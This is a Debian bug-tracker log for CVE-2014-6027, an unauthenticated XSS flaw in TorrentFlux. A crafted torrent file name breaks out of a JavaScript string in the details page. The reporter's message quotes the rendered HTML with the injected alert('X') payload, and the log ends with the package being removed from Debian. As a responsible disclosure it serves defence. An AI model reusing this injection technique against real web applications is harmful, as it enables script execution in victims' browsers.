
Debian Bug report logs - #759574
torrentflux: CVE-2014-6027: XSS in TorrentFlux


Package: torrentflux; Maintainer for torrentflux is (unknown);

Reported by: Nicolas Guigo <nguigo@isecpartners.com>

Date: Thu, 28 Aug 2014 17:51:02 UTC

Severity: grave

Tags: security, upstream

Found in version torrentflux/2.4-5

Fixed in version 2.4-5.1+rm

Done: Debian FTP Masters <ftpmaster@ftp-master.debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Cameron Dale <camrdale@gmail.com>:
Bug#759574; Package torrentflux. (Thu, 28 Aug 2014 17:51:06 GMT)


Acknowledgement sent to Nicolas Guigo <nguigo@isecpartners.com>:
New Bug report received and forwarded. Copy sent to Cameron Dale <camrdale@gmail.com>. (Thu, 28 Aug 2014 17:51:06 GMT)


Message #5 received at submit@bugs.debian.org:

From: Nicolas Guigo <nguigo@isecpartners.com>
To: "submit@bugs.debian.org" <submit@bugs.debian.org>
Subject: XSS in TorrentFlux
Date: Thu, 28 Aug 2014 17:48:10 +0000
[Message part 1 (text/plain, inline)]
Package: torrentflux

Version: 2.4.5-1

 

The XSS can be triggered by an unauthenticated attacker. A malicious torrent file such as the POC attached can be crafted and shared by an attacker. Upon starting the download from Torrentflux, some of the file contents are pasted without output encoding into a script section, triggering the XSS. An alternate vector (authenticated) is for an attacker to upload the torrent file to his own account and subsequently share a link to the torrent's details (<http://www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_2013.12.torrent>).

 

</td></tr></table><br><div align="left" id="BodyLayer" name="BodyLayer" style="border: thin solid #000000; position:relative; width:740; height:500; padding-left: 5px; padding-right: 5px; z-index:1; overflow: scroll; visibility: visible">
<link rel="StyleSheet" href="dtree.css" type="text/css" /><script type="text/javascript" src="dtree.js"></script>
<table>
<tr><tr><td width="110">Metainfo File:</td><td>pclinuxos_kde_2013.12.torrent</td></tr>
<tr><td>Directory Name:</td><td>pclinuxos-kde-2013.12</td></tr>
<tr><td>Announce URL:</td><td>http://linuxtracker.org:2710/00000000000000000000000000000000/announce</td></tr>
<tr><td valign="top">Comment:</td><td>pclinuxos-kde-2013.12</td></tr>
<tr><td>Created:</td><td>December 4, 2013, 12:37 pm</td></tr>
<tr><td>Torrent Size:</td><td>1698693120 (1.58 GB)</td></tr>
<tr><td>Chunk size:</td><td>2097152 (2 MB)</td></tr>
<tr><td>Selected size:</td><td id="sel">0</td></tr>
</table><br>

<form name="priority" action="index.php" method="POST" ><input type="hidden" name="torrent" value="pclinuxos_kde_2013.12.torrent" ><input type="hidden" name="setPriorityOnly" value="true" >
<script type="text/javascript">
var sel = 0;
d = new dTree('d');
d.add(4,-1,"/",-1,0);
d.add(0,4,"kde-2013.12.jpg (78175)",-1,78175);
d.add(1,4,"pclinuxos-kde-2013.12.iso (1697839104)",-1,1697839104);
d.add(2,4,"pclinuxos-kde-2013.12.md5sum (60)",-1,60);
d.add(3,4,"X");alert('X');//pg (181733)",-1,181733);
document.write(d);
sel = getSizes();
drawSel();

 

Please find attached the full proof of concept torrent file.

 

--
Nicolas Guigo
Senior Security Engineer
iSEC Partners (NCC GROUP)
(206) 948-3687
9C80 28B2 F016 4DA4 24C9  D1D7 129C FDF6 0CDC B828

 

[Message part 2 (text/html, inline)]
[pclinuxos-kde-2013.12.torrent (application/x-bittorrent, attachment)]
[smime.p7s (application/pkcs7-signature, attachment)]

Severity set to 'grave' from 'normal'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Fri, 29 Aug 2014 16:18:10 GMT)


Added tag(s) upstream and security. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Fri, 29 Aug 2014 16:18:11 GMT)


Marked as found in versions torrentflux/2.4-5. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Fri, 29 Aug 2014 16:18:12 GMT)


Changed Bug title to 'torrentflux: CVE-2014-6027: XSS in TorrentFlux' from 'XSS in TorrentFlux'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Wed, 03 Sep 2014 04:36:07 GMT)


Reply sent to Debian FTP Masters <ftpmaster@ftp-master.debian.org>:
You have taken responsibility. (Wed, 10 Sep 2014 10:42:44 GMT)


Notification sent to Nicolas Guigo <nguigo@isecpartners.com>:
Bug acknowledged by developer. (Wed, 10 Sep 2014 10:42:44 GMT)


Message #18 received at 759574-done@bugs.debian.org:

From: Debian FTP Masters <ftpmaster@ftp-master.debian.org>
To: 398537-done@bugs.debian.org,407061-done@bugs.debian.org,407065-done@bugs.debian.org,407066-done@bugs.debian.org,428076-done@bugs.debian.org,481894-done@bugs.debian.org,669787-done@bugs.debian.org,677061-done@bugs.debian.org,759573-done@bugs.debian.org,759574-done@bugs.debian.org,
Cc: torrentflux@packages.debian.org, torrentflux@packages.qa.debian.org
Subject: Bug#761008: Removed package(s) from unstable
Date: Wed, 10 Sep 2014 10:40:15 +0000
Version: 2.4-5.1+rm

Dear submitter,

as the package torrentflux has just been removed from the Debian archive
unstable we hereby close the associated bug reports.  We are sorry
that we couldn't deal with your issue properly.

For details on the removal, please see https://bugs.debian.org/761008

The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.

This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmaster@ftp-master.debian.org.

Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)



Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 26 Apr 2015 07:50:59 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Mon Jul 28 13:27:32 2025; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU General Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.